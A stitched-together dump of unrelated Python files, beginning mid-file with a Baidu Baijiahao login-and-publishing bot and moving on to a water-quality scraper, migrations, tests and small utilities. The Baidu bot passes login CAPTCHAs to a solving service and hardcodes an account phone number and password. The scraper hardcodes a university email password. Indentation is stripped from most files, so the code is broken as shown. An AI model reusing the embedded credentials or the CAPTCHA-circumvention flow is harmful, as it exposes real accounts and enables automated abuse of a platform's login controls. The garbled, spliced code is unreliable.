# "dv": "tk0.10998763779832511551159571840@mmr0hm94nxpkqGPQIGPmf-Ckq~9zf-943G9m-jOL-GpkniC4JX0kn-7rffpvxyPvfG94B~94Ow94nxpkqGPQIGPmf-C4qH76f-943G9m-jOL-Gpkny9W9y0q__vr0uv94qHCHfH9WJGCku~9m-w74D-pkux7mf-CWNR9m-w949yCmfRCRnGCk5fCkNG0knHCR3G9RuxpkBx94Bzp2oh43OrBJy0Kyh4J2wiKyYyDXIH4Z2gMKf-945ipk9X7rfX7k5X91-JBJx6J32CKyYBJyh0C2Y0Dv2RDzOeDZowxkkECku4nCODhurh9rfHpkDHGrQOvGfpWnf743~CRNRCRDx7k9HC4n-C4J-94JxC4D-7kBfhrQE6oiD69apHYfNL~jNZ2UM6JjNXYgpH-yPZoTMZTjMLB_~rs9mffpkn~7kDG74nXpknx9WqG94q~9mf-74ufpknx9WqG94qi7q__",
"traceid": traceid,
"callback": "parent." + callback,
}
resp = session.post(url='https://passport.baidu.com/v2/api/?login', data=post_data)
ss = resp.text
if 'err_no=0' in ss or 'err_no=23' in ss or 'err_no=400037' in ss or 'err_no=5' in ss:
cookies = session.cookies.get_dict()
return cookies, ''
else:
cookies = BaiJia.break_code(ss, session, post_data)
session.cookies = requests.cookies.cookiejar_from_dict(cookies)
resp = session.get('https://baijiahao.baidu.com/builder/app/appinfo').json()
if resp['errmsg'] == 'success':
BaiJia.logger.info('成功')
cookies = session.cookies.get_dict()
u_name = resp['data']['user']['username']
BaiJia.logger.info(u_name)
return cookies, u_name
raise CustomException('账号或密码错误')
@staticmethod
def break_code(ss, session, post_data):
flag = 5
while flag:
time.sleep(1)
BaiJia.logger.info('重试{}次'.format(flag))
callback = re.findall(r'callback=(.*?)&codeString', ss)[0]
get_code = re.findall(r'codeString=(.*?)&userName', ss)[0]
if not get_code:
result = ''
else:
code = session.get("https://passport.baidu.com/cgi-bin/genimage", params=get_code, stream=True)
if code.status_code == 200:
with open("code.png", 'wb') as f:
f.write(code.content)
cid, result = verify_captcha('code.png', 5000)
if os.path.exists('code.png'):
os.remove('code.png')
post_data['verifycode'] = result
post_data['codestring'] = get_code
post_data['callback'] = callback
time.sleep(0.5)
ss = session.post(url='https://passport.baidu.com/v2/api/?login', data=post_data)
ss = ss.text
BaiJia.logger.info(flag)
BaiJia.logger.info(ss)
if 'err_no=0' in ss or 'err_no=23' in ss or 'err_no=400037' in ss or 'err_no=5' in ss:
cookies = session.cookies.get_dict()
return cookies
else:
flag -= 1
err = re.compile(r'"err_no=(.*?)&').findall(ss)[0]
BaiJia.logger.info(err)
if err == "120021":
msg = '请用手机短信登录'
elif err == "257":
msg = '请输入验证码'
else:
msg = '账号密码不对'
raise CustomException(msg)
@staticmethod
def get_token(gid, callback, session):
get_data = {
'tpl': 'netdisk',
'subpro': 'netdisk_web',
'apiver': 'v3',
'tt': int(time.time() * 1000),
'class': 'login',
'gid': gid,
'logintype': 'basicLogin',
'callback': callback
}
session.cookies.update(
dict(HOSUPPORT='1', expires='Sat, 15-May-2027 03:42:54 GMT; path=/', domain='passport.baidu.com; httponly'))
resp = session.get(url='https://passport.baidu.com/v2/api/?getapi', params=get_data)
if resp.status_code == 200 and callback in resp.text:
data = json.loads(re.search(r'.*?\((.*)\)', resp.text).group(1).replace("'", '"'))
return data.get('data').get('token')
else:
print('获取token失败')
return None
@staticmethod
def get_rsa_key(token, gid, callback, session, traceid):
get_data = {
'token': token,
'tpl': 'netdisk',
'subpro': 'netdisk_web',
'apiver': 'v3',
'tt': int(time.time() * 1000),
'gid': gid,
'callback': callback,
'loginversion': 'v4',
'traceid': traceid
}
resp = session.get(url='https://passport.baidu.com/v2/getpublickey', params=get_data)
if resp.status_code == 200 and callback in resp.text:
data = json.loads(re.search(r'.*?\((.*)\)', resp.text).group(1).replace("'", '"'))
return data.get('pubkey'), data.get('key')
else:
print('获取rsa key失败')
return None
@staticmethod
def _get_runntime():
"""
Compile the login JS used to generate the request parameters.
Note: do not use Chinese characters in the JS source; pyexecjs still seems to have trouble handling them.
:return: the compiled JS environment (see the pyexecjs docs on GitHub if the library is unfamiliar)
"""
phantom = execjs.get() # a phantomjs runtime must be configured via environment variables here; otherwise write the concrete phantomjs path
source = toutiao_login_js.baidu_login_js
return phantom.compile(source)
def publish(self, title, content, category, flag=1):
"""
:param title:
:param content:
:param category:
:return: status, cause
"""
try:
status = 3
cause = ''
self.logger.info("account: %s title:%s " % (self.account.account, title))
result = re.compile(r'<img.*?src="(.*?)".*?>', re.S).findall(content) # extract the img src URLs from the content
if not result:
cause = '请上传文章封面'
self.logger.error(cause)
return status, cause
for img in result:
con_img = img.replace("&", "&")
content = content.replace(img, con_img)
cover = result[0]
# 上传
self.session.post(
'https://baijiahao.baidu.com/builder/author/article/articleDiagnose',
data={
'content': content,
'type': 'news'
}, )
self.session.post(
'https://baijiahao.baidu.com/builder/author/article/titleRecommend',
data={
'title': title,
'content': content,
'feed_cat': self.feed_cat[category]
}
)
data = {
'title': title,
'content': content,
'feed_cat': '11',
'len': len(content),
'original_status': '0',
'source_reprinted_allow': '2',
'cover_auto_images': '[{"src":"%s","width":476,"height":340,"is_suitable":true}]' % cover,
'spd_info': '{"goods_info":[]}',
'cover_layout': 'auto',
'cover_images': '[]',
'_cover_images_map': '[]',
'type': 'news',
'isBeautify': 'false',
'announce_id': 0,
'subtitle': ''
}
# if flag == 3:
# del data['cover_auto_images']
# data['cover_layout'] = 'three'
# cover_images = []
# for img in result[:3]:
# cover_images.append({"src": "{}".format(img), "cropData":
# {"x": 10, "y": 0, "width": 507, "height": 340}})
# data['cover_layout'] = cover_images
self.session.get('https://ttl-bjh.baidu.com/cms/statistics/statistics/img/s.gif?op_time={}'
'&client_type=pc&app_id=1536772421402989&'
'page_url=https%3A%2F%2Fbaijiahao.baidu.com%2Fbuilder%2Frc%2Fedit%3Ftype%3Dnews%26'
'app_id%3D1536772421402989&refer=https%3A%2F%2Fbaijiahao.baidu.com%2Fbuilder%2Fauthor%2'
'Fregister%2Findex&urlkey=custom-%E5%8F%91%E6%96%87%E6%93%8D%E4%BD%9C-%E6%96%B0%E7%'
'89%88%E6%8E%A5%E5%8F%A3&bjh_param=%7B%22type%22%3A%22news%22%2C%22articleId%22%3Anull%7D'
.format(int(time.time() * 1000)))
resp = self.session.post(
'https://baijiahao.baidu.com/builder/author/article/publish',
data=data,
).json()
self.logger.info(resp)
if resp['errno'] == 0:
status = 2
cause = ''
return status, cause
elif '频繁' in resp['errmsg']:
return 1, ''
else:
cause = resp['errmsg']
return 3, cause
except Exception as e:
self.logger.error('发文失败,检查账号可用性', e)
raise CustomException('百家发文失败,检查账号:%s' % self.account.account)
def read_count(self,
start_day=datetime.datetime.now() - datetime.timedelta(days=int(7)),
end_day=datetime.datetime.now() - datetime.timedelta(days=int(1))):
self.logger.info("account: %s" % self.account.account)
res = self.session.get(
"https://baijiahao.baidu.com/builder/app/appinfo").json()
if res['errno'] != 0:
raise CustomException(res['errmsg'])
username = res['data']['user']['name']
res = self.session.post(
"https://baijiahao.baidu.com/builder/author/statistic/appStatistic",
data={
"type": "news",
"is_yesterday": "false",
"start_day": start_day.strftime("%Y%m%d"),
"end_day": end_day.strftime("%Y%m%d"),
"stat": "0"}).json()
read_list = []
for data in res['data']['list']:
if int(data['recommend_count']) == -1:
continue
readcount = {
"day_time": time.strftime('%Y-%m-%d', time.strptime(data['event_day'], "%Y%m%d")),
"user_name": username,
"like_num": data.get("likes_count", 0),
"recomment_num": data.get("recommend_count", 0),
"read_num": data.get("view_count", 0),
"comment_num": data.get("comment_count", 0),
"share_num": data.get("share_count", 0),
"collect_num": data.get("collect_count", 0)
}
read_list.append(readcount)
# logging.info(readcount)
return read_list
def fetch_article_status(self, title):
url = ''
re_a = re.compile('<[a-zA-Z\/!].*?>', re.S)
resp = self.session.get(
'https://baijiahao.baidu.com/builder/article/lists?type=&collection=&pageSize=10&currentPage=1&search='
).json()
if resp['errno'] != 0:
raise CustomException('账号异常')
articles = resp['data']['list']
res = [2, '没查询到该文章', url]
for art in articles:
if title != art['title']:
continue
if art['status'] == 'rejected':
url = art['url']
res = 5, re_a.sub('', art['audit_msg']).replace(' ', ''), url
elif art['status'] == 'publish':
url = art['url']
res = 4, '', url
return res
def upload_image(self, image_name, image_data):
resp = self.session.post(
'https://baijiahao.baidu.com/builderinner/api/content/file/upload',
files={
'media': (image_name, image_data, 'image/jpeg', {
'is_waterlog': '1', 'save_material': '1',
'type': 'image', "no_compress": '0',
'app_id': '1594805746441778',
})}
).json()
if resp['error_code'] != 0:
raise CustomException('上传失败')
return resp['ret']['no_waterlog_bos_url']
def check_user_cookies(self):
self.logger.info('')
try:
res = self.session.get(
"https://baijiahao.baidu.com/builder/app/appinfo").json()
if not res['errno']:
return True
except Exception as e:
self.logger.error(e)
return False
def query_article_data(self, title):
"""获取单篇文章阅读"""
resp = self.session.get(
'https://baijiahao.baidu.com/builder/article/lists?type=&collection=&pageSize=10&currentPage=1&search='
).json()
if resp['errno'] != 0:
raise CustomException(resp['errmsg'])
arts = resp['data']['list']
for art in arts:
if title != art['title']:
continue
else:
data = dict(
read_num=art['read_amount'],
recomment_num=art['rec_amount'],
comment_num=int(art['comment_amount']),
share_num=art['share_amount'],
like_num=int(art['like_amount']),
collect_num=art['collection_amount'],
publish_time=art['updated_at'],
follow_num=-1
)
return data
return ''
def query_account_message(self):
return []
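# A minimal standalone sketch of the RSA step used in BaiJia.login(): encrypt the password with
# an RSA public key and base64-encode the ciphertext. The throwaway key pair generated below is
# purely for illustration; the real public key is fetched via get_rsa_key().
def _demo_encrypt_password(pswd='example-password'):
    pub, _priv = rsa.newkeys(512) # locally generated demo key pair
    ciphertext = rsa.encrypt(pswd.encode('utf-8'), pub)
    return base64.b64encode(ciphertext).decode('utf-8')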
if __name__ == '__main__':
ss = BaiJia.login('13522068263', 'JINGmeiti123')
print(ss)
|
#!/usr/bin/env python3
# xlattice_py/testTimestamp.py
""" Test timestamp-related functions. """
import calendar
import os
import time
import unittest
from xlutil import(mk_epoch_from_utc, get_utc_timestamp,
parse_timestamp, timestamp, timestamp_now)
from rnglib import SimpleRNG
class TestTimestamp(unittest.TestCase):
""" Test timestamp-related functions. """
def setUp(self):
self.rng = SimpleRNG(time.time())
def tearDown(self):
pass
# Note that in the Go code timestamp is an int64, whereas here it
# is a string.
def test_constructor(self):
""" Verify that successive timestamps are about the same. """
struct_now = time.gmtime() # struct_time
gmt_now = calendar.timegm(struct_now) # seconds from epoch
str_now = timestamp(gmt_now)
now_again = parse_timestamp(str_now)
str_again = timestamp(now_again)
self.assertEqual(str_now, str_again)
def test_parser(self):
""" Exercise the timestamp parser. """
example = "2004-11-18 20:03:34"
from_epoch = parse_timestamp(example) # seconds from epoch
from_as_str = timestamp(from_epoch)
self.assertEqual(from_as_str, example)
def test_now(self):
""" Verify that timestamp_now() returns the GMT time. """
struct_now = time.gmtime() # struct_time
gmt_now = calendar.timegm(struct_now) # seconds from epoch
now_as_str = timestamp_now() # in string format
now2 = parse_timestamp(now_as_str)
self.assertTrue(now2 - gmt_now <= 1)
def test_epoch_converter(self):
# using code should set this:
os.environ['TZ'] = 'UTC'
t__ = time.time()
tstamp = get_utc_timestamp() # UTC
s__ = mk_epoch_from_utc(tstamp)
if t__ > s__:
delta_t = t__ - s__
else:
delta_t = s__ - t__
self.assertTrue(delta_t <= 1)
if __name__ == '__main__':
unittest.main()
|
# Generated by Django 3.2.11 on 2022-02-28 14:32
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django_extensions.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Notification',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('notification_type', models.CharField(choices=[('user_action', 'User Action'), ('info', 'Info'), ('recommend', 'Recommend')], default='user_action', max_length=20)),
('sender_object_id', models.PositiveIntegerField()),
('description', models.CharField(max_length=255)),
('is_read', models.BooleanField(db_index=True, default=False)),
('url', models.URLField(blank=True, null=True)),
('recipient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notifications', to=settings.AUTH_USER_MODEL)),
('sender_content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notify_sender', to='contenttypes.contenttype')),
],
options={
'ordering': ('-created',),
'index_together': {('recipient', 'is_read')},
},
),
]
|
"""Copyright (c) 2021, Nadun De Silva. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from apis import clients
import telemetry
from . import pets, customers, orders
logger = telemetry.get_logger(__name__)
tracer = telemetry.get_tracer(__name__)
def generate_data() -> None:
with tracer.start_as_current_span("generate data") as span:
with clients.pet_store_api_client_context() as client:
logger.info("Generating sample data started")
created_pets = pets.generate(client)
span.set_attribute("gen.pets_count", len(created_pets))
created_customers = customers.generate(client)
span.set_attribute("gen.customers_count", len(created_customers))
created_orders = orders.generate(client, created_customers, created_pets)
span.set_attribute("gen.orders_count", len(created_orders))
logger.info("Generating sample data completed")
|
import os
import numpy as np
from libcity.data.dataset import TrafficStateCPTDataset, TrafficStateGridDataset
from libcity.utils.dataset import timestamp2array, timestamp2vec_origin
class STResNetDataset(TrafficStateGridDataset, TrafficStateCPTDataset):
"""
The STResNet external-data code only uses ext_y; ext_x is not used!
"""
def __init__(self, config):
super().__init__(config)
self.external_time = self.config.get('external_time', True)
self.parameters_str = \
self.parameters_str + '_' + str(self.len_closeness) \
+ '_' + str(self.len_period) + '_' + str(self.len_trend) \
+ '_' + str(self.interval_period) + '_' + str(self.interval_trend)
self.cache_file_name = os.path.join('./libcity/cache/dataset_cache/',
'grid_based_{}.npz'.format(self.parameters_str))
self.pad_forward_period = 0
self.pad_back_period = 0
self.pad_forward_trend = 0
self.pad_back_trend = 0
def _get_external_array(self, timestamp_list, ext_data=None, previous_ext=False, ext_time=True):
"""
Get the external features for the given timestamps.
Args:
    timestamp_list: sequence of timestamps
    ext_data: external data
    previous_ext: whether to use the external data of the previous time slot; the predicted
        slots Y usually have no real external data, so the previous slot's data is used
        (**for multi-step prediction, data from that many steps earlier should be used**)
Returns:
    np.ndarray: External data shape is (len(timestamp_list), ext_dim)
"""
data = []
if ext_time:
vecs_timestamp = timestamp2array(
timestamp_list, 24 * 60 * 60 // self.time_intervals) # len(timestamp_list) * dim
else:
vecs_timestamp = timestamp2vec_origin(timestamp_list) # len(timestamp_list) * dim
data.append(vecs_timestamp)
# external data set
if ext_data is not None:
indexs = []
for ts in timestamp_list:
if previous_ext:
# TODO: this needs to change for multi-step prediction
ts_index = self.idx_of_ext_timesolts[ts - self.offset_frame]
else:
ts_index = self.idx_of_ext_timesolts[ts]
indexs.append(ts_index)
select_data = ext_data[indexs] # len(timestamp_list) * ext_dim, select the data of the required time steps
data.append(select_data)
if len(data) > 0:
data = np.hstack(data)
else:
data = np.zeros((len(timestamp_list), 0))
return data # (len(timestamp_list), ext_dim)
def _load_ext_data(self, ts_x, ts_y):
"""
Load the external data (.ext) for the given timestamps.
Args:
    ts_x: timestamps of the input data X, shape: (num_samples, T_c+T_p+T_t)
    ts_y: timestamps of the output data Y, shape: (num_samples, )
Returns:
    tuple: tuple contains:
        ext_x(np.ndarray): external data for those timestamps, shape: (num_samples, T_c+T_p+T_t, ext_dim),
        ext_y(np.ndarray): external data for those timestamps, shape: (num_samples, ext_dim)
"""
# load the external data
if self.load_external and os.path.exists(self.data_path + self.ext_file + '.ext'): # external data set
ext_data = self._load_ext()
ext_data = 1. * (ext_data - ext_data.min()) / (ext_data.max() - ext_data.min())
else:
ext_data = None
ext_x = []
for ts in ts_x:
ext_x.append(self._get_external_array(ts, ext_data, ext_time=self.external_time))
ext_x = np.asarray(ext_x)
# ext_x: (num_samples_plus, T_c+T_p+T_t, ext_dim)
ext_y = self._get_external_array(ts_y, ext_data, previous_ext=True, ext_time=self.external_time)
# ext_y: (num_samples_plus, ext_dim)
return ext_x, ext_y
def get_data_feature(self):
"""
        Return the dataset features: scaler is the normalization method, adj_mx is the adjacency matrix,
        num_nodes is the number of grid cells, len_row is the number of grid rows, len_column is the
        number of grid columns, feature_dim is the input dimension and output_dim is the model output dimension.
        Returns:
            dict: a dictionary containing the dataset's features
"""
lp = self.len_period * (self.pad_forward_period + self.pad_back_period + 1)
lt = self.len_trend * (self.pad_forward_trend + self.pad_back_trend + 1)
return {"scaler": self.scaler, "adj_mx": self.adj_mx,
"num_nodes": self.num_nodes, "feature_dim": self.feature_dim, "ext_dim": self.ext_dim,
"output_dim": self.output_dim, "len_row": self.len_row, "len_column": self.len_column,
"len_closeness": self.len_closeness, "len_period": lp, "len_trend": lt, "num_batches": self.num_batches}
|
from random import randint
def rockPaperScissors(user,npc):
if user == 1 and npc == 1:
print("Tie")
elif user == 1 and npc == 2:
print("NPC Wins")
elif user == 1 and npc == 3:
print("User Wins!")
elif user == 2 and npc == 1:
print("User Wins")
elif user == 2 and npc == 2:
print("Tie")
elif user == 2 and npc == 3:
print("NPC Wins")
elif user == 3 and npc == 1:
print("NPC Wins")
elif user == 3 and npc == 2:
print("User Wins")
else:
print("Tie")
userIn = ""
print("Welcome to RPS!")
userIn = input("Enter Rock, Paper, Scissors, or Quit: ")
if userIn.lower() == "rock":
rInt = randint(1,3)
print(rInt)
rockPaperScissors(1, rInt)
elif userIn.lower() == "paper":
rInt = randint(1,3)
# RPS(2,rInt)
elif userIn.lower() == "scissors":
rInt = randint(1,3)
# RPS(3,rInt)
else:
print("Invalid Entry!")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Filter for escaping unsafe XML characters: <, >, &
@author Sergey Chikuyonok (serge.che@gmail.com)
@link http://chikuyonok.ru
'''
import re
alias = 'e'
"Filter name alias (if not defined, ZC will use module name)"
char_map = {
    '<': '&lt;',
    '>': '&gt;',
    '&': '&amp;'
}
re_chars = re.compile(r'[<>&]')
def escape_chars(text):
return re_chars.sub(lambda m: char_map[m.group(0)], text)
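# For example: escape_chars('<a & b>') -> '&lt;a &amp; b&gt;'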
def process(tree, profile=None):
for item in tree.children:
item.start = escape_chars(item.start)
item.end = escape_chars(item.end)
        process(item, profile)
return tree
|
#!/usr/bin/env python3
import shutil
import sys
import os
import ntpath
targetFiles = ["source/au/audiounitconfig.h", "source/au/Info.plist", "resource/llllpluginnamellll.rc", "source/version.h",
"source/pluginProcessor.cpp", "source/pluginProcessor.h", "source/pluginController.cpp", "source/pluginController.h",
"source/factoryDefinition.cpp", "CMakeLists.txt"]
def path_leaf(path):
head, tail = ntpath.split(path)
return tail or ntpath.basename(head)
def replaceInFile(searchText, replaceText, filePath):
    if os.path.exists(filePath):
        # read the whole file, then search and replace it in place
        with open(filePath) as inputFile:
            inputStr = inputFile.read()
        if inputStr.count(searchText) > 0:
            with open(filePath, 'w') as outputFile:
                outputFile.write(inputStr.replace(searchText, replaceText))
            print(" replaced", searchText, "with", replaceText, "in", path_leaf(filePath))
    else:
        print(filePath, " not found.")
    return
def replaceAttrInFiles(attr, value):
cwd = os.getcwd()
validAttr = True
searchText = ''
searchTextLowercase = ''
if(attr == 'name'):
searchText = 'llllPluginNamellll'
searchTextLowercase = 'llllpluginnamellll'
elif(attr == 'company'):
searchText = 'llllCompanyllll'
searchTextLowercase = 'llllcompanyllll'
elif(attr == 'subtype'):
searchText = 'lxxl'
elif(attr == 'mfgr'):
searchText = 'LXXL'
elif(attr == 'url'):
searchText = 'llllCompanyURLllll'
elif(attr == 'email'):
searchText = 'lllllCompanyEmailllll'
elif(attr == 'uida'):
searchText = '0xAAAAAAAA, 0xAAAAAAAA, 0xAAAAAAAA, 0xAAAAAAAA'
elif(attr == 'uidb'):
searchText = '0xBBBBBBBB, 0xBBBBBBBB, 0xBBBBBBBB, 0xBBBBBBBB'
else:
validAttr = False
replaceText = value
replaceTextLowercase = str.lower(replaceText)
# search and replace the template attribute in all the target files.
# not all strings we want to replace will be in all the files,
# but for simplicity we just grind through all the files for each search anyway.
if(validAttr):
for file in targetFiles:
fullName = cwd + "/" + file
replaceInFile(searchText, replaceText, fullName)
if searchTextLowercase != '':
replaceInFile(searchTextLowercase, replaceTextLowercase, fullName)
return
# allow running from cmd line
if __name__ == "__main__":
# count the arguments
arguments = len(sys.argv) - 1
if arguments != 2:
print("usage: setPluginInfo <attribute> <stringValue>")
quit()
replaceAttrInFiles(sys.argv[1], sys.argv[2])
|
#!/usr/bin/python3
'''
print following Pattern
1
22
333
4444
if input = 5
'''
#code
for i in range(1, int(input())):
print ((10**(i)//9)*i)
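# Explanatory note (not in the original): 10**i // 9 is the length-i repunit (1, 11, 111, ...),
# and a repunit times a single digit i repeats that digit i times, e.g. (10**3 // 9) * 3 == 333.
# The trick only holds for digits 1..9.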
|
# -*- coding: utf-8 -*-
# @Time : 2019/4/23 14:01
# @Author : hyy
# @Email : 1554148540@qq.com
# @File : water_quality_data.py
# @Software: PyCharm
import requests
import time
import os
import random
import smtplib
from email.mime.text import MIMEText
from email.header import Header
def get_data(url, value, num_retries=2):
    data = None
    req = None
    try:
        req = requests.post(url, data=value, headers=headers)
        data = req.json()
    except Exception as e:
        print('Something went wrong while downloading:', e)
        # retry on 5xx server errors, passing the request payload along
        if num_retries > 0 and req is not None and 500 <= req.status_code < 600:
            time.sleep(10)
            return get_data(url, value, num_retries - 1)
    return data
def email_send(text, time):
    sender = '3140105713@zju.edu.cn'
    receivers = ['1554148540@qq.com']  # recipient; can be set to your QQ mailbox or any other mailbox
    mail_host = "smtp.zju.edu.cn"  # SMTP server
    mail_user = "3140105713@zju.edu.cn"  # user name
    mail_pass = "5896westwood"  # password
    # three arguments: the text content, 'plain' for the text format, 'utf-8' for the encoding
    message = MIMEText(text, 'plain', 'utf-8')
    message['From'] = Header("Water quality data", 'utf-8')  # sender
    message['To'] = Header("hyy", 'utf-8')  # receiver
    subject = 'Water quality data retrieval status ' + time
message['Subject'] = Header(subject, 'utf-8')
try:
smtpObj = smtplib.SMTP()
        smtpObj.connect(mail_host, 25)  # 25 is the SMTP port
smtpObj.login(mail_user, mail_pass)
smtpObj.sendmail(sender, receivers, message.as_string())
print("邮件发送成功")
except smtplib.SMTPException:
print("Error: 无法发送邮件")
if __name__ == '__main__':
    path1 = os.path.abspath('.')  # current working directory (where the script is run)
    folder = os.path.exists(path1 + '\\water_quality_data')
    if not folder:
        os.makedirs(path1 + '\\water_quality_data')
    print('Crawler started')
headers = {
'Host': '123.127.175.45:8082',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Referer': 'http://123.127.175.45:8082/',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '21',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
}
value = {
'Method': 'SelectRealData'
}
url = 'http://123.127.175.45:8082/ajax/GwtWaterHandler.ashx'
# url = 'http://www.baidu.com'
data_ex = requests.post(url, data=value, headers=headers).json()
for item in data_ex:
        with open(path1 + '\\water_quality_data\\' + item['siteName'] + '.txt', 'w', encoding='utf-8') as f:
            f.write('Time pH DO(dissolved oxygen) NH4(ammonia nitrogen) CODMn(permanganate index) '
                    'TOC(total organic carbon) WaterQualityClass SectionAttribute StationStatus \n')
            f.write('{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\t{} \n'.format(item['dateTime'], item['pH'],
                                                                   item['DO'], item['NH4'], item['CODMn'],
                                                                   item['TOC'], item['level'], item['attribute'], item['status']))
    print('Initial data crawl complete')
flag = 1
while True:
print('sleep now')
time.sleep(random.uniform(1,8*60*60))
        data = get_data(url, value)
        if not data:
            continue
        for i in range(len(data)):
if data[i]['dateTime'] == data_ex[i]['dateTime']:
continue
else:
item = data[i]
                with open(path1 + '\\water_quality_data\\' + item['siteName'] + '.txt', 'a', encoding='utf-8') as f:
f.write('{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\t{} \n'.format(item['dateTime'], item['pH'],
item['DO'], item['NH4'], item['CODMn'],
item['TOC'], item['level'],
item['attribute'], item['status']))
data_ex = data
if flag % 10 == 1:
            run_stage = 'Crawl time: {}'.format(data[0]['dateTime'])
            email_send(run_stage, data[0]['dateTime'])
        print('Crawl finished at: ', end='')
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
flag += 1
|
from datetime import datetime
def convert_dt(year: int, month: int, day: int) -> str:
return datetime(year, month, day).strftime('%Y-%m-%d %H:%M:%S')
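# Example: convert_dt(2021, 3, 14) -> '2021-03-14 00:00:00'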
|
import csv
import os
# path to the csv files
path = './csv/'
# data-cleaning function data_wash; takes filename, la_max (maximum latitude) and ln_max (maximum longitude)
def data_wash(filename, la_max, ln_max):
    # open the output csv and its writer; the result is saved as: original filename + '_output'
    csv_out_file = open(path + filename + '_output', 'w')
    csv_writer = csv.writer(csv_out_file)
    # open the file to be processed and count its rows
    with open(path + filename, 'r') as csv_file:
        csv_reader = csv.reader(csv_file)
        line_count = 0
        for line in csv_reader:
            line_count += 1
    print('File: {} has {} rows'.format(filename, line_count))
    if line_count < 50:  # files with fewer than 50 rows of data are deleted
        print('File has fewer than 50 rows of data, deleting...')
        csv_out_file.close()
        os.remove(path + filename)
        return
    with open(path + filename, 'r') as csv_file:
        csv_reader2 = csv.reader(csv_file)
        # read each csv row
        for item in csv_reader2:
            # fields are read as strings and must be converted to float before comparing;
            # try/except keeps malformed content from terminating the program
            try:
                # flag rows whose first field (latitude) exceeds la_max or whose second field (longitude) exceeds ln_max
                if float(item[0]) > la_max or float(item[1]) > ln_max:
                    print('This row: {} is outside the latitude/longitude range'.format(item))
                else:  # otherwise write the row to the new csv file
                    csv_writer.writerow(item)
            except BaseException as e:
                print('File content does not match the expected format (latitude, longitude, other fields, ...), or the disk is full')
                print(e)
    csv_out_file.close()
# get the list of files in the directory
file_list = os.listdir(path)
print('Files in the csv directory: {}'.format(file_list))
# process each file by calling data_wash
for file in file_list:
    print('Processing file: {}'.format(file))
    data_wash(file, 41, 117)
|
"""empty message
Revision ID: d55a3395296c
Revises: 19d023a4f56c
Create Date: 2017-03-16 15:24:42.688425
"""
# revision identifiers, used by Alembic.
revision = 'd55a3395296c'
down_revision = '19d023a4f56c'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('addresses',
sa.Column('created', sa.DateTime(), nullable=True),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('postal_address', sa.String(length=255), nullable=True),
sa.Column('zip', sa.String(length=25), nullable=True),
sa.Column('country', sa.String(length=50), nullable=True),
sa.Column('comment', sa.String(length=250), nullable=True),
sa.Column('deleted', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('addresses')
### end Alembic commands ###
|
from __future__ import print_function
import os
import ast
import json
import demisto_client
from threading import Thread, Lock
from demisto_sdk.commands.common.tools import print_color, LOG_COLORS, run_threads_list, print_error
from Tests.Marketplace.marketplace_services import PACKS_FULL_PATH, IGNORED_FILES
PACK_METADATA_FILE = 'pack_metadata.json'
SUCCESS_FLAG = True
def get_pack_display_name(pack_id):
metadata_path = os.path.join(PACKS_FULL_PATH, pack_id, PACK_METADATA_FILE)
if pack_id and os.path.isfile(metadata_path):
with open(metadata_path, 'r') as json_file:
pack_metadata = json.load(json_file)
return pack_metadata.get('name')
return ''
def get_pack_data_from_results(search_results, pack_display_name):
if not search_results:
return {}
for pack in search_results:
if pack.get('name') == pack_display_name:
return {
'id': pack.get('id'),
'version': pack.get('currentVersion')
}
return {}
def create_dependencies_data_structure(response_data, dependants_ids, dependencies_data, checked_packs):
""" Recursively creates the packs' dependencies data structure for the installation requests
(only required and uninstalled).
Args:
response_data (dict): The GET /search/dependencies response data.
dependants_ids (list): A list of the dependant packs IDs.
dependencies_data (list): The dependencies data structure to be created.
checked_packs (list): Required dependants that were already found.
"""
next_call_dependants_ids = []
for dependency in response_data:
dependants = dependency.get('dependants', {})
for dependant in dependants.keys():
is_required = dependants[dependant].get('level', '') == 'required'
if dependant in dependants_ids and is_required and dependency.get('id') not in checked_packs:
dependencies_data.append({
'id': dependency.get('id'),
'version': dependency.get('extras', {}).get('pack', {}).get('currentVersion')
})
next_call_dependants_ids.append(dependency.get('id'))
checked_packs.append(dependency.get('id'))
if next_call_dependants_ids:
create_dependencies_data_structure(response_data, next_call_dependants_ids, dependencies_data, checked_packs)
def get_pack_dependencies(client, prints_manager, pack_data, thread_index, lock):
""" Get the pack's required dependencies.
Args:
client (demisto_client): The configured client to use.
prints_manager (ParallelPrintsManager): A prints manager object.
pack_data (dict): Contains the pack ID and version.
thread_index (int): the thread index.
lock (Lock): A lock object.
Returns:
(list) The pack's dependencies.
"""
pack_id = pack_data['id']
try:
response_data, status_code, _ = demisto_client.generic_request_func(
client,
path='/contentpacks/marketplace/search/dependencies',
